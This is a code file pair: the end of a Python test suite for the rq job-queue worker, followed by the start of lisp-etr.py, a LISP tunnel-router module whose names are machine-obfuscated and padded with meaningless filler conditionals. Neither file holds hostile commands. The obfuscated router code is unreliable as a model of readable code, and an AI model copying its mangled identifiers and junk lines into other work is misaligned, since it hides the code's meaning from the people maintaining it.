self.assertIsNotNone(death_date)
self.assertIsInstance(death_date, datetime)
def test_clean_queue_registries(self):
"""worker.clean_registries sets last_cleaned_at and cleans registries."""
foo_queue = Queue('foo', connection=self.testconn)
foo_registry = StartedJobRegistry('foo', connection=self.testconn)
self.testconn.zadd(foo_registry.key, {'foo': 1})
self.assertEqual(self.testconn.zcard(foo_registry.key), 1)
bar_queue = Queue('bar', connection=self.testconn)
bar_registry = StartedJobRegistry('bar', connection=self.testconn)
self.testconn.zadd(bar_registry.key, {'bar': 1})
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
worker = Worker([foo_queue, bar_queue])
self.assertEqual(worker.last_cleaned_at, None)
worker.clean_registries()
self.assertNotEqual(worker.last_cleaned_at, None)
self.assertEqual(self.testconn.zcard(foo_registry.key), 0)
self.assertEqual(self.testconn.zcard(bar_registry.key), 0)
# worker.clean_registries() only runs once every 15 minutes
# If we add another key, calling clean_registries() should do nothing
self.testconn.zadd(bar_registry.key, {'bar': 1})
worker.clean_registries()
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
def test_should_run_maintenance_tasks(self):
"""Workers should run maintenance tasks on startup and every hour."""
queue = Queue(connection=self.testconn)
worker = Worker(queue)
self.assertTrue(worker.should_run_maintenance_tasks)
worker.last_cleaned_at = utcnow()
self.assertFalse(worker.should_run_maintenance_tasks)
worker.last_cleaned_at = utcnow() - timedelta(seconds=3700)
self.assertTrue(worker.should_run_maintenance_tasks)
def test_worker_calls_clean_registries(self):
"""Worker calls clean_registries when run."""
queue = Queue(connection=self.testconn)
registry = StartedJobRegistry(connection=self.testconn)
self.testconn.zadd(registry.key, {'foo': 1})
worker = Worker(queue, connection=self.testconn)
worker.work(burst=True)
self.assertEqual(self.testconn.zcard(registry.key), 0)
def test_job_dependency_race_condition(self):
"""Dependencies added while the job gets finished shouldn't get lost."""
# This patches the enqueue_dependents to enqueue a new dependency AFTER
# the original code was executed.
orig_enqueue_dependents = Queue.enqueue_dependents
def new_enqueue_dependents(self, job, *args, **kwargs):
orig_enqueue_dependents(self, job, *args, **kwargs)
if hasattr(Queue, '_add_enqueue') and Queue._add_enqueue is not None and Queue._add_enqueue.id == job.id:
Queue._add_enqueue = None
Queue().enqueue_call(say_hello, depends_on=job)
Queue.enqueue_dependents = new_enqueue_dependents
q = Queue()
w = Worker([q])
with mock.patch.object(Worker, 'execute_job', wraps=w.execute_job) as mocked:
parent_job = q.enqueue(say_hello, result_ttl=0)
Queue._add_enqueue = parent_job
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
# The created spy checks two issues:
# * before the fix of #739, 2 of the 3 jobs where executed due
# to the race condition
# * during the development another issue was fixed:
# due to a missing pipeline usage in Queue.enqueue_job, the job
# which was enqueued before the "rollback" was executed twice.
# So before that fix the call count was 4 instead of 3
self.assertEqual(mocked.call_count, 3)
def test_self_modification_persistence(self):
"""Make sure that any meta modification done by
the job itself persists completely through the
queue/worker/job stack."""
q = Queue()
# Also make sure that previously existing metadata
# persists properly
job = q.enqueue(modify_self, meta={'foo': 'bar', 'baz': 42},
args=[{'baz': 10, 'newinfo': 'waka'}])
w = Worker([q])
w.work(burst=True)
job_check = Job.fetch(job.id)
self.assertEqual(job_check.meta['foo'], 'bar')
self.assertEqual(job_check.meta['baz'], 10)
self.assertEqual(job_check.meta['newinfo'], 'waka')
def test_self_modification_persistence_with_error(self):
"""Make sure that any meta modification done by
the job itself persists completely through the
queue/worker/job stack -- even if the job errored"""
q = Queue()
# Also make sure that previously existing metadata
# persists properly
job = q.enqueue(modify_self_and_error, meta={'foo': 'bar', 'baz': 42},
args=[{'baz': 10, 'newinfo': 'waka'}])
w = Worker([q])
w.work(burst=True)
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
job_check = Job.fetch(job.id)
self.assertEqual(job_check.meta['foo'], 'bar')
self.assertEqual(job_check.meta['baz'], 10)
self.assertEqual(job_check.meta['newinfo'], 'waka')
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_true(self, mock_logger_info):
"""Check that log_result_lifespan True causes job lifespan to be logged."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.perform_job(job, q)
mock_logger_info.assert_called_with('Result is kept for %s seconds', 10)
self.assertIn('Result is kept for %s seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_false(self, mock_logger_info):
"""Check that log_result_lifespan False causes job lifespan to not be logged."""
q = Queue()
class TestWorker(Worker):
log_result_lifespan = False
w = TestWorker([q])
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.perform_job(job, q)
self.assertNotIn('Result is kept for 10 seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_true(self, mock_logger_info):
"""Check that log_job_description True causes job lifespan to be logged."""
q = Queue()
w = Worker([q])
q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.dequeue_job_and_maintain_ttl(10)
self.assertIn("Frank", mock_logger_info.call_args[0][2])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_false(self, mock_logger_info):
"""Check that log_job_description False causes job lifespan to not be logged."""
q = Queue()
w = Worker([q], log_job_description=False)
q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.dequeue_job_and_maintain_ttl(10)
self.assertNotIn("Frank", mock_logger_info.call_args[0][2])
def test_worker_version(self):
q = Queue()
w = Worker([q])
w.version = '0.0.0'
w.register_birth()
self.assertEqual(w.version, '0.0.0')
w.refresh()
self.assertEqual(w.version, '0.0.0')
# making sure that version is preserved when worker is retrieved by key
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.version, '0.0.0')
def test_python_version(self):
python_version = sys.version
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(w.python_version, python_version)
# now patching version
python_version = 'X.Y.Z.final' # dummy version
self.assertNotEqual(python_version, sys.version) # otherwise tests are pointless
w2 = Worker([q])
w2.python_version = python_version
w2.register_birth()
self.assertEqual(w2.python_version, python_version)
# making sure that version is preserved when worker is retrieved by key
worker = Worker.find_by_key(w2.key)
self.assertEqual(worker.python_version, python_version)
def wait_and_kill_work_horse(pid, time_to_wait=0.0):
time.sleep(time_to_wait)
os.kill(pid, signal.SIGKILL)
class TimeoutTestCase:
def setUp(self):
# we want tests to fail if signal are ignored and the work remain
# running, so set a signal to kill them after X seconds
self.killtimeout = 15
signal.signal(signal.SIGALRM, self._timeout)
signal.alarm(self.killtimeout)
def _timeout(self, signal, frame):
raise AssertionError(
"test still running after %i seconds, likely the worker wasn't shutdown correctly" % self.killtimeout
)
class WorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
@slow
def test_idle_worker_warm_shutdown(self):
"""worker with no ongoing job receiving single SIGTERM signal and shutting down"""
w = Worker('foo')
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), False))
p.start()
w.work()
p.join(1)
self.assertFalse(w._stop_requested)
@slow
def test_working_worker_warm_shutdown(self):
"""worker with an ongoing job receiving single SIGTERM signal, allowing job to finish then shutting down"""
fooq = Queue('foo')
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_warm'
fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), False))
p.start()
w.work()
p.join(2)
self.assertFalse(p.is_alive())
self.assertTrue(w._stop_requested)
self.assertTrue(os.path.exists(sentinel_file))
self.assertIsNotNone(w.shutdown_requested_date)
self.assertEqual(type(w.shutdown_requested_date).__name__, 'datetime')
@slow
def test_working_worker_cold_shutdown(self):
"""Busy worker shuts down immediately on double SIGTERM signal"""
fooq = Queue('foo')
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_cold'
fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), True))
p.start()
self.assertRaises(SystemExit, w.work)
p.join(1)
self.assertTrue(w._stop_requested)
self.assertFalse(os.path.exists(sentinel_file))
shutdown_requested_date = w.shutdown_requested_date
self.assertIsNotNone(shutdown_requested_date)
self.assertEqual(type(shutdown_requested_date).__name__, 'datetime')
@slow
def test_work_horse_death_sets_job_failed(self):
"""worker with an ongoing job whose work horse dies unexpectadly (before
completing the job) should set the job's status to FAILED
"""
fooq = Queue('foo')
self.assertEqual(fooq.count, 0)
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
if os.path.exists(sentinel_file):
os.remove(sentinel_file)
fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
job, queue = w.dequeue_job_and_maintain_ttl(5)
w.fork_work_horse(job, queue)
p = Process(target=wait_and_kill_work_horse, args=(w._horse_pid, 0.5))
p.start()
w.monitor_work_horse(job)
job_status = job.get_status()
p.join(1)
self.assertEqual(job_status, JobStatus.FAILED)
failed_job_registry = FailedJobRegistry(queue=fooq)
self.assertTrue(job in failed_job_registry)
self.assertEqual(fooq.count, 0)
@slow
def test_work_horse_force_death(self):
"""Simulate a frozen worker that doesn't observe the timeout properly.
Fake it by artificially setting the timeout of the parent process to
something much smaller after the process is already forked.
"""
fooq = Queue('foo')
self.assertEqual(fooq.count, 0)
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
if os.path.exists(sentinel_file):
os.remove(sentinel_file)
fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
job, queue = w.dequeue_job_and_maintain_ttl(5)
w.fork_work_horse(job, queue)
job.timeout = 5
w.job_monitoring_interval = 1
now = utcnow()
w.monitor_work_horse(job)
fudge_factor = 1
total_time = w.job_monitoring_interval + 65 + fudge_factor
self.assertTrue((utcnow() - now).total_seconds() < total_time)
self.assertEqual(job.get_status(), JobStatus.FAILED)
failed_job_registry = FailedJobRegistry(queue=fooq)
self.assertTrue(job in failed_job_registry)
self.assertEqual(fooq.count, 0)
def schedule_access_self():
q = Queue('default', connection=get_current_connection())
q.enqueue(access_self)
@pytest.mark.skipif(sys.platform == 'darwin', reason='Fails on OS X')
class TestWorkerSubprocess(RQTestCase):
def setUp(self):
super(TestWorkerSubprocess, self).setUp()
db_num = self.testconn.connection_pool.connection_kwargs['db']
self.redis_url = 'redis://127.0.0.1:6379/%d' % db_num
def test_run_empty_queue(self):
"""Run the worker in its own process with an empty queue"""
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
def test_run_access_self(self):
"""Schedule a job, then run the worker as subprocess"""
q = Queue()
job = q.enqueue(access_self)
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
registry = FinishedJobRegistry(queue=q)
self.assertTrue(job in registry)
assert q.count == 0
@skipIf('pypy' in sys.version.lower(), 'often times out with pypy')
def test_run_scheduled_access_self(self):
"""Schedule a job that schedules a job, then run the worker as subprocess"""
q = Queue()
job = q.enqueue(schedule_access_self)
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
registry = FinishedJobRegistry(queue=q)
self.assertTrue(job in registry)
assert q.count == 0
@pytest.mark.skipif(sys.platform == 'darwin', reason='requires Linux signals')
@skipIf('pypy' in sys.version.lower(), 'these tests often fail on pypy')
class HerokuWorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
def setUp(self):
super(HerokuWorkerShutdownTestCase, self).setUp()
self.sandbox = '/tmp/rq_shutdown/'
os.makedirs(self.sandbox)
def tearDown(self):
shutil.rmtree(self.sandbox, ignore_errors=True)
@slow
def test_immediate_shutdown(self):
"""Heroku work horse shutdown with immediate (0 second) kill"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 0))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
with open(os.path.join(self.sandbox, 'stderr.log')) as f:
stderr = f.read().strip('\n')
err = 'ShutDownImminentException: shut down imminent (signal: SIGRTMIN)'
self.assertTrue(stderr.endswith(err), stderr)
@slow
def test_1_sec_shutdown(self):
"""Heroku work horse shutdown with 1 second kill"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 1))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
time.sleep(0.1)
self.assertEqual(p.exitcode, None)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
with open(os.path.join(self.sandbox, 'stderr.log')) as f:
stderr = f.read().strip('\n')
err = 'ShutDownImminentException: shut down imminent (signal: SIGALRM)'
self.assertTrue(stderr.endswith(err), stderr)
@slow
def test_shutdown_double_sigrtmin(self):
"""Heroku work horse shutdown with long delay but SIGRTMIN sent twice"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 10))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
# we have to wait a short while otherwise the second signal wont bet processed.
time.sleep(0.1)
os.kill(p.pid, signal.SIGRTMIN)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
with open(os.path.join(self.sandbox, 'stderr.log')) as f:
stderr = f.read().strip('\n')
err = 'ShutDownImminentException: shut down imminent (signal: SIGRTMIN)'
self.assertTrue(stderr.endswith(err), stderr)
@mock.patch('rq.worker.logger.info')
def test_handle_shutdown_request(self, mock_logger_info):
"""Mutate HerokuWorker so _horse_pid refers to an artificial process
and test handle_warm_shutdown_request"""
w = HerokuWorker('foo')
path = os.path.join(self.sandbox, 'shouldnt_exist')
p = Process(target=create_file_after_timeout, args=(path, 2))
p.start()
self.assertEqual(p.exitcode, None)
w._horse_pid = p.pid
w.handle_warm_shutdown_request()
p.join(2)
# would expect p.exitcode to be -34
self.assertEqual(p.exitcode, -34)
self.assertFalse(os.path.exists(path))
mock_logger_info.assert_called_with('Killed horse pid %s', p.pid)
def test_handle_shutdown_request_no_horse(self):
"""Mutate HerokuWorker so _horse_pid refers to non existent process
and test handle_warm_shutdown_request"""
w = HerokuWorker('foo')
w._horse_pid = 19999
w.handle_warm_shutdown_request()
class TestExceptionHandlerMessageEncoding(RQTestCase):
def setUp(self):
super(TestExceptionHandlerMessageEncoding, self).setUp()
self.worker = Worker("foo")
self.worker._exc_handlers = []
# Mimic how exception info is actually passed forwards
try:
raise Exception(u"💪")
except Exception:
self.exc_info = sys.exc_info()
def test_handle_exception_handles_non_ascii_in_exception_message(self):
"""worker.handle_exception doesn't crash on non-ascii in exception message."""
self.worker.handle_exception(Mock(), *self.exc_info)
|
lisp-etr.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-etr.py
#
# This file performs LISP Egress Tunnel Router (ETR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import socket
import select
import threading
import time
import pcappy
import struct
import commands
import os
try :
import pytun
except :
pytun = None
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
IiII1IiiIiI1 = { 17 : "IGMP-query" , 18 : "IGMPv1-report" , 19 : "DVMRP" ,
20 : "PIMv1" , 22 : "IGMPv2-report" , 23 : "IGMPv2-leave" ,
30 : "mtrace-response" , 31 : "mtrace-request" , 34 : "IGMPv3-report" }
if 40 - 40: oo * OoO0O00
if 2 - 2: ooOO00oOo % oOo0O0Ooo * Ooo00oOo00o . oOoO0oo0OOOo + iiiiIi11i
if 24 - 24: II11iiII / OoOO0ooOOoo0O + o0000oOoOoO0o * i1I1ii1II1iII % oooO0oo0oOOOO
if 53 - 53: o0oo0o / Oo + o0oo0o / oooO0oo0oOOOO * OoooooooOO + i1I1ii1II1iII
if 71 - 71: II11iiII * i1I1ii1II1iII . II11iiII / o0oo0o
if 14 - 14: iIii1I11I1II1
o0oOoO00o = None
i1 = None
oOOoo00O0O = None
i1111 = None
i11 = lisp . lisp_get_ephemeral_port ( )
I11 = None
Oo0o0000o0o0 = [ None , None , None ]
oOo0oooo00o = None
oO0o0o0ooO0oO = None
oo0o0O00 = None
if 68 - 68: II11iiII . oo / i1I1ii1II1iII
oOOoo = 60
if 43 - 43: o0oo0o % oo - i11iIiiIii - ooOO00oOo / II11iiII - oOo0O0Ooo
if 45 - 45: o0oo0o + o0000oOoOoO0o
if 17 - 17: Ooo00oOo00o
if 64 - 64: o0000oOoOoO0o % i1IIi % OoooooooOO
if 3 - 3: i1I1ii1II1iII + O0
if 42 - 42: II11iiII / i1IIi + i11iIiiIii - o0000oOoOoO0o
if 78 - 78: ooOO00oOo
if 18 - 18: O0 - i1I1ii1II1iII / i1I1ii1II1iII + Oo % Oo - oooO0oo0oOOOO
if 62 - 62: i1I1ii1II1iII - oooO0oo0oOOOO - oOo0O0Ooo % i1IIi / iiiiIi11i
def OoooooOoo ( kv_pair ) :
global i1
global Oo0o0000o0o0
if 70 - 70: ooOO00oOo . ooOO00oOo - ooOO00oOo / oOoO0oo0OOOo * II11iiII
lispconfig . lisp_database_mapping_command ( kv_pair , i11 )
if 86 - 86: i11iIiiIii + o0000oOoOoO0o + Oo * OoOO0ooOOoo0O + Ooo00oOo00o
if 61 - 61: ooOO00oOo / i11iIiiIii
if 34 - 34: OoooooooOO + iIii1I11I1II1 + i11iIiiIii - oOoO0oo0OOOo + i11iIiiIii
if 65 - 65: oOo0O0Ooo
if 6 - 6: oo / OoO0O00 % o0000oOoOoO0o
if 84 - 84: i11iIiiIii . Ooo00oOo00o
if 100 - 100: o0000oOoOoO0o - o0000oOoOoO0o - o0oo0o
if 20 - 20: OoooooooOO
if ( lisp . lisp_nat_traversal ) : return
if ( i1 != None and
i1 . is_alive ( ) ) : return
if 13 - 13: i1IIi - o0000oOoOoO0o % iiiiIi11i / iIii1I11I1II1 % i1I1ii1II1iII
if ( len ( lisp . lisp_map_servers_list ) > 0 ) :
i1 = threading . Timer ( 5 ,
ooO0o0Oo , [ Oo0o0000o0o0 ] )
i1 . start ( )
if 78 - 78: iIii1I11I1II1 - o0000oOoOoO0o * ooOO00oOo + Ooo00oOo00o + i1I1ii1II1iII + i1I1ii1II1iII
if 11 - 11: i1I1ii1II1iII - ooOO00oOo % Oo % i1I1ii1II1iII / oOo0O0Ooo - ooOO00oOo
if 74 - 74: i1I1ii1II1iII * O0
if 89 - 89: iiiiIi11i + OoO0O00
if 3 - 3: i1IIi / oo % OoOO0ooOOoo0O * i11iIiiIii / O0 * OoOO0ooOOoo0O
if 49 - 49: iiiiIi11i % o0000oOoOoO0o + i1IIi . oo % oOoO0oo0OOOo
if 48 - 48: OoOO0ooOOoo0O + OoOO0ooOOoo0O / II111iiii / iIii1I11I1II1
if 20 - 20: Ooo00oOo00o
def oO00 ( clause ) :
if 53 - 53: OoooooooOO . i1IIi
if 18 - 18: Ooo00oOo00o
if 28 - 28: II11iiII - oooO0oo0oOOOO . oooO0oo0oOOOO + oOo0O0Ooo - OoooooooOO + O0
if 95 - 95: ooOO00oOo % iiiiIi11i . O0
I1i1I = lispconfig . lisp_show_myrlocs ( "" )
if 80 - 80: oOo0O0Ooo - ooOO00oOo
if 87 - 87: iiiiIi11i / OoOO0ooOOoo0O - i1IIi * II11iiII / OoooooooOO . O0
if 1 - 1: II111iiii - OoOO0ooOOoo0O / OoOO0ooOOoo0O
if 46 - 46: o0000oOoOoO0o * II11iiII - ooOO00oOo * iiiiIi11i - o0oo0o
I1i1I = lispconfig . lisp_show_decap_stats ( I1i1I , "ETR" )
if 83 - 83: OoooooooOO
if 31 - 31: II111iiii - II11iiII . o0oo0o % oOo0O0Ooo - O0
if 4 - 4: II111iiii / Oo . i1I1ii1II1iII
if 58 - 58: II11iiII * i11iIiiIii / oOo0O0Ooo % o0oo0o - oOoO0oo0OOOo / iiiiIi11i
ii11i1 = "{} configured map-servers" . format ( len ( lisp . lisp_map_servers_list ) )
IIIii1II1II = lisp . lisp_span ( "LISP-ETR Configured Map-Servers:" , ii11i1 )
ii11i1 = ( "P = proxy-reply requested, M = merge-registrations " + "requested, N = Map-Notify requested" )
if 42 - 42: o0000oOoOoO0o + iiiiIi11i
o0O0o0Oo = lisp . lisp_span ( "Registration<br>flags" , ii11i1 )
if 16 - 16: O0 - o0oo0o * iIii1I11I1II1 + i1I1ii1II1iII
I1i1I += lispconfig . lisp_table_header ( IIIii1II1II , "Address" , "Auth-Type" ,
"xTR-ID" , "Site-ID" , o0O0o0Oo , "Map-Registers<br>Sent" ,
"Map-Notifies<br>Received" )
if 50 - 50: II111iiii - Oo * oOoO0oo0OOOo / o0oo0o + Ooo00oOo00o
for O0O0O in lisp . lisp_map_servers_list . values ( ) :
O0O0O . resolve_dns_name ( )
oO0Oo = "" if O0O0O . ms_name == "all" else O0O0O . ms_name + "<br>"
oOOoo0Oo = oO0Oo + O0O0O . map_server . print_address ( )
if ( O0O0O . dns_name ) : oOOoo0Oo += "<br>" + O0O0O . dns_name
if 78 - 78: OoOO0ooOOoo0O
OO00Oo = "0x" + lisp . lisp_hex_string ( O0O0O . xtr_id )
O0OOO0OOoO0O = "{}-{}-{}-{}" . format ( "P" if O0O0O . proxy_reply else "p" ,
"M" if O0O0O . merge_registrations else "m" ,
"N" if O0O0O . want_map_notify else "n" ,
"R" if O0O0O . refresh_registrations else "r" )
if 70 - 70: oooO0oo0oOOOO * OoO0O00 * OoOO0ooOOoo0O / o0000oOoOoO0o
oO = O0O0O . map_registers_sent + O0O0O . map_registers_multicast_sent
if 93 - 93: ooOO00oOo % iiiiIi11i . ooOO00oOo * o0oo0o % o0000oOoOoO0o . II111iiii
if 38 - 38: Ooo00oOo00o
I1i1I += lispconfig . lisp_table_row ( oOOoo0Oo ,
"sha1" if ( O0O0O . alg_id == lisp . LISP_SHA_1_96_ALG_ID ) else "sha2" ,
OO00Oo , O0O0O . site_id , O0OOO0OOoO0O , oO ,
O0O0O . map_notifies_received )
if 57 - 57: O0 / iiiiIi11i * o0oo0o / oOo0O0Ooo . II111iiii
I1i1I += lispconfig . lisp_table_footer ( )
if 26 - 26: i1I1ii1II1iII
if 91 - 91: ooOO00oOo . oOoO0oo0OOOo + ooOO00oOo - i1I1ii1II1iII / OoooooooOO
if 39 - 39: oOoO0oo0OOOo / Oo - II111iiii
if 98 - 98: oOoO0oo0OOOo / OoOO0ooOOoo0O % iiiiIi11i . oOo0O0Ooo
I1i1I = lispconfig . lisp_show_db_list ( "ETR" , I1i1I )
if 91 - 91: iiiiIi11i % OoO0O00
if 64 - 64: OoOO0ooOOoo0O % i1I1ii1II1iII - o0oo0o - iiiiIi11i
if 31 - 31: OoOO0ooOOoo0O - II111iiii . OoOO0ooOOoo0O
if 18 - 18: Ooo00oOo00o
if ( len ( lisp . lisp_elp_list ) != 0 ) :
I1i1I = lispconfig . lisp_show_elp_list ( I1i1I )
if 98 - 98: i1I1ii1II1iII * i1I1ii1II1iII / i1I1ii1II1iII + OoOO0ooOOoo0O
if 34 - 34: Oo
if 15 - 15: OoOO0ooOOoo0O * Oo * OoO0O00 % i11iIiiIii % oOo0O0Ooo - II11iiII
if 68 - 68: o0oo0o % i1IIi . oooO0oo0oOOOO . oOoO0oo0OOOo
if 92 - 92: i1I1ii1II1iII . o0oo0o
if ( len ( lisp . lisp_rle_list ) != 0 ) :
I1i1I = lispconfig . lisp_show_rle_list ( I1i1I )
if 31 - 31: o0oo0o . oOo0O0Ooo / O0
if 89 - 89: oOo0O0Ooo
if 68 - 68: ooOO00oOo * OoooooooOO % O0 + ooOO00oOo + Oo
if 4 - 4: Oo + O0 * II11iiII
if 55 - 55: OoO0O00 + iIii1I11I1II1 / oOo0O0Ooo * iiiiIi11i - i11iIiiIii - o0000oOoOoO0o
if ( len ( lisp . lisp_json_list ) != 0 ) :
I1i1I = lispconfig . lisp_show_json_list ( I1i1I )
if 25 - 25: oOoO0oo0OOOo
if 7 - 7: i1IIi / oo * o0oo0o . oooO0oo0oOOOO . iIii1I11I1II1
if 13 - 13: II11iiII / i11iIiiIii
if 2 - 2: oo / O0 / Ooo00oOo00o % oOo0O0Ooo % o0000oOoOoO0o
if 52 - 52: Ooo00oOo00o
if ( len ( lisp . lisp_group_mapping_list ) != 0 ) :
IIIii1II1II = "Configured Group Mappings:"
I1i1I += lispconfig . lisp_table_header ( IIIii1II1II , "Name" , "Group Prefix" ,
"Sources" , "Use MS" )
for o0OO0oOO0O0 in lisp . lisp_group_mapping_list . values ( ) :
iiiIIi1II = ""
for o0O00oOoOO in o0OO0oOO0O0 . sources : iiiIIi1II += o0O00oOoOO + ", "
if ( iiiIIi1II == "" ) :
iiiIIi1II = "*"
else :
iiiIIi1II = iiiIIi1II [ 0 : - 2 ]
if 42 - 42: ooOO00oOo
I1i1I += lispconfig . lisp_table_row ( o0OO0oOO0O0 . group_name ,
o0OO0oOO0O0 . group_prefix . print_prefix ( ) , iiiIIi1II , o0OO0oOO0O0 . use_ms_name )
if 67 - 67: o0oo0o . i1I1ii1II1iII . O0
I1i1I += lispconfig . lisp_table_footer ( )
if 10 - 10: oOoO0oo0OOOo % oOoO0oo0OOOo - iIii1I11I1II1 / II11iiII + o0000oOoOoO0o
return ( I1i1I )
if 87 - 87: iiiiIi11i * oOoO0oo0OOOo + II11iiII / iIii1I11I1II1 / i1I1ii1II1iII
if 37 - 37: i1I1ii1II1iII - Oo * iiiiIi11i % i11iIiiIii - o0oo0o
if 83 - 83: OoOO0ooOOoo0O / oo
if 34 - 34: oooO0oo0oOOOO
if 57 - 57: iiiiIi11i . OoOO0ooOOoo0O . i1IIi
if 42 - 42: OoOO0ooOOoo0O + oOoO0oo0OOOo % O0
if 6 - 6: iiiiIi11i
def oOOo0oOo0 ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "ETR" ) )
if 49 - 49: OoO0O00 . i11iIiiIii - i1IIi / II111iiii . oo
if 1 - 1: OoO0O00 / Ooo00oOo00o % i1I1ii1II1iII * oooO0oo0oOOOO . i11iIiiIii
if 2 - 2: oOoO0oo0OOOo * OoOO0ooOOoo0O - iIii1I11I1II1 + oo . iiiiIi11i % i1I1ii1II1iII
if 92 - 92: i1I1ii1II1iII
if 25 - 25: OoO0O00 - oo / OoooooooOO / Ooo00oOo00o
if 12 - 12: oo * i1I1ii1II1iII % i1IIi % iIii1I11I1II1
if 20 - 20: II11iiII % o0000oOoOoO0o / o0000oOoOoO0o + o0000oOoOoO0o
def III1IiiI ( kv_pairs ) :
global i1
global oOOoo00O0O
if 31 - 31: Ooo00oOo00o . oo
ii11IIII11I = [ ]
OOooo = [ ]
oOooOOOoOo = 0
i1Iii1i1I = 0
OOoO00 = ""
IiI111111IIII = False
i1Ii = False
ii111iI1iIi1 = False
OOO = False
oo0OOo0 = 0
oO0Oo = None
I11IiI = 0
O0ooO0Oo00o = None
if 77 - 77: iIii1I11I1II1 * ooOO00oOo
for oOooOo0 in kv_pairs . keys ( ) :
i1I1ii11i1Iii = kv_pairs [ oOooOo0 ]
if ( oOooOo0 == "ms-name" ) :
oO0Oo = i1I1ii11i1Iii [ 0 ]
if 26 - 26: OoOO0ooOOoo0O - iIii1I11I1II1 - oo / ooOO00oOo . oOo0O0Ooo % iIii1I11I1II1
if ( oOooOo0 == "address" ) :
for OO in range ( len ( i1I1ii11i1Iii ) ) :
ii11IIII11I . append ( i1I1ii11i1Iii [ OO ] )
if 25 - 25: ooOO00oOo
if 62 - 62: II11iiII + O0
if ( oOooOo0 == "dns-name" ) :
for OO in range ( len ( i1I1ii11i1Iii ) ) :
OOooo . append ( i1I1ii11i1Iii [ OO ] )
if 98 - 98: Ooo00oOo00o
if 51 - 51: OoO0O00 - iiiiIi11i + II111iiii * o0000oOoOoO0o . OoOO0ooOOoo0O + iiiiIi11i
if ( oOooOo0 == "authentication-type" ) :
i1Iii1i1I = lisp . LISP_SHA_1_96_ALG_ID if ( i1I1ii11i1Iii == "sha1" ) else lisp . LISP_SHA_256_128_ALG_ID if ( i1I1ii11i1Iii == "sha2" ) else ""
if 78 - 78: i11iIiiIii / i1I1ii1II1iII - o0000oOoOoO0o / II11iiII + iiiiIi11i
if 82 - 82: o0000oOoOoO0o
if ( oOooOo0 == "authentication-key" ) :
if ( i1Iii1i1I == 0 ) : i1Iii1i1I = lisp . LISP_SHA_256_128_ALG_ID
ii = lisp . lisp_parse_auth_key ( i1I1ii11i1Iii )
oOooOOOoOo = ii . keys ( ) [ 0 ]
OOoO00 = ii [ oOooOOOoOo ]
if 5 - 5: Oo - II111iiii - OoooooooOO % o0000oOoOoO0o + oo * iIii1I11I1II1
if ( oOooOo0 == "proxy-reply" ) :
IiI111111IIII = True if i1I1ii11i1Iii == "yes" else False
if 37 - 37: oooO0oo0oOOOO % Oo + oOo0O0Ooo + Ooo00oOo00o * OoOO0ooOOoo0O % O0
if ( oOooOo0 == "merge-registrations" ) :
